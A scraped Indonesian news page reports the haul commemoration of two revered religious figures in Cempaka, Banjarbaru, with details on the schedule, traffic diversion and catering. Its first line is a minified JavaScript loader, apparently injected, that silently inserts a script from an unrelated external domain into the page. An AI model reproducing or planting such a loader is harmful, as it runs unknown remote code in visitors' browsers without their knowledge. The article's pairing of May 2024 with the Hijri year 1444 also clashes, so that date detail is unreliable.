(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
RELIGI

Haul Dua Wali Allah di Cempaka yang Sangat Dermawan dan Hidup Sederhana


KANALKALIMANTAN.COM, BANJARBARU – Haul Syarifah Badrun Al Qadiri Al Hasani bin Sayyid Yusuf Al-Qadiri Al-Hasani dan Habib Ja’far bin Habib Sulaiman Baharun, digelar Jumat (10/5/2024) malam atau tepat 29 Syawal 1444 Hijriyah.

Sosok Syarifah Badrun dan Habib Ja’far dikenal sebagai wali majdub yang bermakam di Kelurahan Sungai Tiung, Kecamatan Cempaka, Kota Banjarbaru, Kalimantan Selatan (Kalsel). Tepatnya di tepi Jalan HM Mistar Cokrokusumo.

Tahun ini merupakan tahun ke-24 haul Syarifah Badrun dan tahun ke-10 peringatan haul Habib Ja’far yang dilaksanakan warga Cempaka.

Baca juga: Jhonny Iskandar Meninggal Dunia, Ini Profil Pelantun “Bukan Pengemis Cinta”

Khairun Nafis, kordinator posko induk haul. Foto: wanda

Khairun Nafis, koordinator posko induk haul mengatakan, rangkaian kegiatan haul akan berlangsung sama seperti haul yang bisa digelar warga Kalsel.

“Seperti haul pada umumnya, mengacunya pada rangkaian Haul Sekumpul,” kata Khairun Nafis, Ketua RW 07 di Kelurahan Sungai Tiung Cempaka, Jumat (10/5/2024) siang.

Bakda Isya malam ini, kegiatan haul akan diisi oleh rombongan jemaah dari Cempaka dan sekitarnya, para zuriat, dan habaib.

“Acaranya habis salat Isya di panggung utama, setelah rangkaian berakhir biasanya tamu undangan para habaib langsung ziarah ke makam,” ungkapnya.

Baca juga: Peringati Hari Buruh, PLN Tebar Kebaikan untuk Petugas Kebersihan Kebun Raya Banua

Menurutnya, jemaah yang datang selalu bertambah setiap tahunnya. Sejumlah persiapan pun ditingkatkan oleh panitia, mulai dari konsumsi, kantong parkir, dan pengaturan jalan untuk pengalihan arus lalu lintas.

“Mulai dari konsumsi, parkir, pengarahan jalan hingga peralihan arus semuanya sudah dikordinasikan, baik kepada dinas terkait, kesehatan, kelurahan, kecamatan bersama panitia,” jelas dia.

Adapun pengalihan arus dilakukan pada kawasan kubah di Jalan Mistar Cokrokusumo di mana ba’da magrib, jalan tersebut akan steril dari kendaraan bermotor.

“Jadi bagi pengendara dari arah Pelaihari diarahkan ke jalan Taruna Bakti menuju Palam. Sementara zona jemaah kita bagi menjadi zona A dan B yang masing-masing disediakan titik-titik parkir,” jelasnya.

Baca juga: TMMD di Desa Sungai Karias Bangun Ulang Rumah Tak Layak Huni

Melihat antusias jemaah, panitia menyiapkan sebanyak 10 ribu lebih konsumsi berupa nasi bungkus dan air minum untuk dibagikan.

Antusias jemaah dalam menyelenggarakan haul ini pula, dijelaskan Khairun tak luput dari sosok dua wali ini yang dikenal sebagai seorang yang dermawan meski hidup dengan kesederhanaan.

Salah satu warga, Bakianoor mengatakan, warga Cempaka mengenal sosok Syarifah Badrun dan Habib Ja’far ini sebagai orang yang memiliki karomah luar biasa.

“Seperti tidak terduga karomah beliau, menurut ulun wali majdub keduanya, pakaian beliau pun sederhana, juga kesehariannya beliau tidak ada bergelut dengan kemewahan,” ujar Bakianoor. (Kanalkalimantan.com/wanda)

Reporter : wanda
Editor : bie


Muhammad Andi

Recent Posts

Syarat Dukungan Ditolak, Bakal Calon Perseorangan Pilwali Banjarmasin Ajukan Sengketa ke Bawaslu

KANALKALIMANTAN.COM, BANJARMASIN - Di awal tahapan Pemilihan Wali Kota dan Wakil Wali Kota (Pilwali) Banjarmasin… Read More

7 jam ago

ETLE Segera Terpasang di Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Sejumlah titik krusial pelanggaran lalu lintas dan kerawanan kecelakaan lalu lintas menjadi… Read More

7 jam ago

Dinas PUPR Kalsel Gelar Bimtek Pengelolaan Air Limbah

KANALKALIMANTAN.COM, BANJARMASIN - Dinas Pekerjaan Umum dan Penataan Ruang (PUPR) Provinsi Kalsel mengadakan kegiatan Bimbingan… Read More

8 jam ago

Rekomendasi Partai Tak Pasti, Jaya-Abdi Siap Jadi Penantang Petahana Aditya-Yuti

Jaya : Penantang Bisa Lebih dalam Mengevaluasi Kinerja Petahana Read More

9 jam ago

Lima Jabatan di Polres Banjarbaru Rotasi, 12 Personel Terima Penghargaan Kapolda

KANALKALIMANTAN.COM, BANJARBARU - Lima jabatan yang diisi para perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

10 jam ago

Nurgita Tiyas Berharap Guru Dapat Lebih Cakap Digital

KANALKALIMANTAN.COM, BANJARMASIN - Ketua TP PKK Kabupaten Banjar Hj Nurgita Tiyas menghadiri Talkshow Literasi Digital… Read More

10 jam ago

This website uses cookies.